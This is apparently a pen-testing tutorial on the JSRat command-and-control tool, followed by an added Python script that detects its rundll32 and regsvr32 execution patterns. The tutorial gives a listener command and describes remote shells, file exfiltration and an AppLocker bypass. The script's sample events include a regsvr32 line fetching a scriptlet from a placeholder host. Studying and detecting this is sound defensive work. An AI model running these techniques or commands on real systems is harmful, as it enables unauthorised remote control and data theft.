There are a number of command and control tools that use a variety of methods to hide malicious traffic or to execute implants in various formats. Casey Smith originally developed a prototype tool that uses JavaScript as a payload and connects back to a listening web server. The security researcher 3gstudent extended Casey Smith's work and developed JSRat in PowerShell, which provides some additional functionality. Other variations of this tool exist in Python, so the master host can be either a Linux or a Windows machine. Similarly, another C2 tool that can generate JavaScript implants is PoshC2 from Nettitude.

JSRat is a command and control tool that uses JavaScript payloads and the HTTP protocol for communication between the server and the target hosts. There are two implementations, one in Python and one in PowerShell; the usage of each is described below.

Python

The Python implementation of JSRat starts a web server and waits for the client command to be executed on the target:

python MyJSRat.py -i 192.168.1.203 -p 8080
JSRat - Server

Once the user visits the Client Command URL, a connection is established with the host. JSRat can be used to execute commands, run executables and scripts, or just for data exfiltration.

JSRat - Usage Options

In order to establish a proper shell, a JavaScript payload needs to be executed on the target. This payload is served at the URL shown below:

JSRat - Generated Command

The generated command needs to be executed from a command prompt on the target.

JSRat - Implant Execution

Once the command is executed, a shell is received on the server side.

JSRat - Console

Commands can be executed from the shell as normal.

JSRat - Command Execution

JSRat can also read, download or upload files on the target.

JSRat - Data Exfiltration

Executables and scripts can also be run by following a sequence like the one below (the run command followed by the executable name):

  1. run
  2. calc.exe
JSRat - Run Executables

There is also another Python implementation of this tool that additionally provides a method of bypassing AppLocker (via regsvr32).

JSRat - AppLocker Bypass Method

In this mode JSRat generates and hosts a scriptlet file that contains the payload.

PowerShell

Alternatively, there is also a PowerShell implementation of JSRat that can perform the same operations from a PowerShell console. The script needs to be modified with the IP address of the listener prior to any execution.

JSRat PowerShell - Server Listening

The payload command that needs to be executed on the target is also included in the comments of the script.

JSRat PowerShell - Payload Command

Running the payload command connects the target host back to the listener, and a console is obtained.

JSRat PowerShell - Usage

Commands can be executed on the target as in any other normal command prompt.

JSRat PowerShell - Command Execution

Conclusion

The major advantage of this command and control tool is that no implant needs to be written to disk. It is very fast, and all communication is done over HTTP, which is a common protocol. Since JSRat uses JavaScript payloads, detection is hard unless rundll32 is monitored. Enabling and configuring AppLocker to deny execution of rundll32 and regsvr32 will prevent the attack.
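The two execution primitives the post relies on, rundll32 running an inline JavaScript payload and regsvr32 loading a hosted scriptlet, both leave a distinctive process-creation record, which is the monitoring the conclusion recommends. The following is an added example (not part of the original post and not JSRat's own code) that scans process-creation events for exactly those two patterns. The event layout (a simplified key=value form modelled on Sysmon process-creation fields), the field names and every sample value are constructed assumptions; the payload and URL in the samples are placeholders.

```python
"""Flag JSRat-style JavaScript implant execution in process-creation events.

Added example, not part of the original post or of JSRat. Log format,
field names and all sample values below are constructed assumptions.
"""
import re
from typing import Dict, List, Optional

# Constructed sample records (not real telemetry): one process-creation
# event per line, fields separated by '|' in key=value form.
SAMPLE_EVENTS = [
    'Image=C:\\Windows\\System32\\rundll32.exe|ParentImage=C:\\Windows\\System32\\cmd.exe'
    '|CommandLine=rundll32.exe javascript:"<constructed placeholder>"',
    'Image=C:\\Windows\\System32\\regsvr32.exe|ParentImage=C:\\Windows\\System32\\cmd.exe'
    '|CommandLine=regsvr32.exe /s /u /i:http://<constructed-host>/placeholder.sct scrobj.dll',
    # Benign look-alikes: a vendor installer registering a local DLL, and
    # Explorer invoking a Control Panel applet through rundll32.
    'Image=C:\\Windows\\System32\\regsvr32.exe|ParentImage=C:\\Windows\\System32\\msiexec.exe'
    '|CommandLine=regsvr32.exe /s C:\\Program Files\\Vendor\\vendor.dll',
    'Image=C:\\Windows\\System32\\rundll32.exe|ParentImage=C:\\Windows\\explorer.exe'
    '|CommandLine=rundll32.exe shell32.dll,Control_RunDLL',
]

# Only these two LOLBins are of interest here; everything else is ignored.
SUSPICIOUS_IMAGES = {"rundll32.exe", "regsvr32.exe"}
# regsvr32 handed an /i: argument that is an HTTP(S) URL rather than a local path.
URL_ARG = re.compile(r"/i:\s*https?://", re.IGNORECASE)


def parse_event(line: str) -> Dict[str, str]:
    """Split one 'key=value|key=value' record into a dict."""
    fields: Dict[str, str] = {}
    for part in line.split("|"):
        key, _, value = part.partition("=")
        fields[key.strip()] = value.strip()
    return fields


def image_name(path: str) -> str:
    """Return the lower-cased file name of a Windows image path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event: Dict[str, str]) -> Optional[str]:
    """Return a reason string if the event matches a JSRat execution pattern."""
    img = image_name(event.get("Image", ""))
    cmd = event.get("CommandLine", "").lower()
    if img not in SUSPICIOUS_IMAGES:
        return None
    # rundll32 is normally given a DLL and export; an inline javascript:
    # argument is the in-memory payload technique described in the post.
    if img == "rundll32.exe" and "javascript:" in cmd:
        return "rundll32 inline JavaScript payload"
    # regsvr32 pointed at a remote scriptlet (via scrobj.dll or an /i: URL)
    # is the AppLocker bypass variant described in the post.
    if img == "regsvr32.exe" and ("scrobj.dll" in cmd or URL_ARG.search(cmd)):
        return "regsvr32 remote scriptlet execution"
    return None


def scan(lines: List[str]) -> List[Dict[str, str]]:
    """Scan raw event lines and return one finding per suspicious event."""
    findings: List[Dict[str, str]] = []
    for line in lines:
        event = parse_event(line)
        reason = classify(event)
        if reason:
            findings.append({
                "image": image_name(event.get("Image", "")),
                "parent": image_name(event.get("ParentImage", "")),
                "command": event.get("CommandLine", ""),
                "reason": reason,
            })
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(f"[{finding['reason']}] parent={finding['parent']} cmd={finding['command']}")
```

The two benign samples pass through untouched, which is the point of keying on the command-line argument rather than on the image name alone: rundll32 and regsvr32 are used legitimately all day on a Windows host, so a rule that simply fires on their execution is unusable, whereas the inline `javascript:` argument and an HTTP URL in regsvr32's `/i:` switch have no routine administrative use. Where AppLocker cannot be configured to block both binaries outright, this kind of command-line match is the monitoring the conclusion refers to.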
